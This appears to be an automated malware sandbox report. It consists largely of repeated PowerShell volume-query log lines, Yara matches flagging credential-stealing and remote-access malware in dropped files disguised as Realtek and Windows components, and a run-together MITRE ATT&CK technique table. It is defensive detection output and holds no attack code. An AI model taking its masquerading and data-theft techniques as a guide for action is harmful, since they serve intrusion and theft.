                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeCode function: 0_2_0040310D EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040310D
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Windows Shell Experience Host.exe PID: 1892, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, type: DROPPED
                          Source: Yara matchFile source: 2.0.Realtek HD Audio Universal Service.exe.b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.2043414047.00000000000B2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Realtek HD Audio Universal Service.exe PID: 528, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Windows Shell Experience Host.exe PID: 1892, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Windows Shell Experience Host.exe PID: 1892, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, type: DROPPED
                          Source: Yara matchFile source: 2.0.Realtek HD Audio Universal Service.exe.b0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.2043414047.00000000000B2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Realtek HD Audio Universal Service.exe PID: 528, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Windows Shell Experience Host.exe PID: 1892, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, type: DROPPED
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          11
                          Disable or Modify Tools
                          1
                          Input Capture
                          2
                          File and Directory Discovery
                          Remote Services11
                          Archive Collected Data
                          1
                          Ingress Tool Transfer
                          Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts1
                          PowerShell
                          1
                          Registry Run Keys / Startup Folder
                          11
                          Process Injection
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory26
                          System Information Discovery
                          Remote Desktop Protocol1
                          Input Capture
                          11
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                          Registry Run Keys / Startup Folder
                          11
                          Obfuscated Files or Information
                          Security Account Manager321
                          Security Software Discovery
                          SMB/Windows Admin Shares1
                          Clipboard Data
                          1
                          Non-Standard Port
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                          Software Packing
                          NTDS1
                          Process Discovery
                          Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Timestomp
                          LSA Secrets51
                          Virtualization/Sandbox Evasion
                          SSHKeylogging14
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          DLL Side-Loading
                          Cached Domain Credentials1
                          Application Window Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                          Masquerading
                          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job51
                          Virtualization/Sandbox Evasion
                          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                          Process Injection
                          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
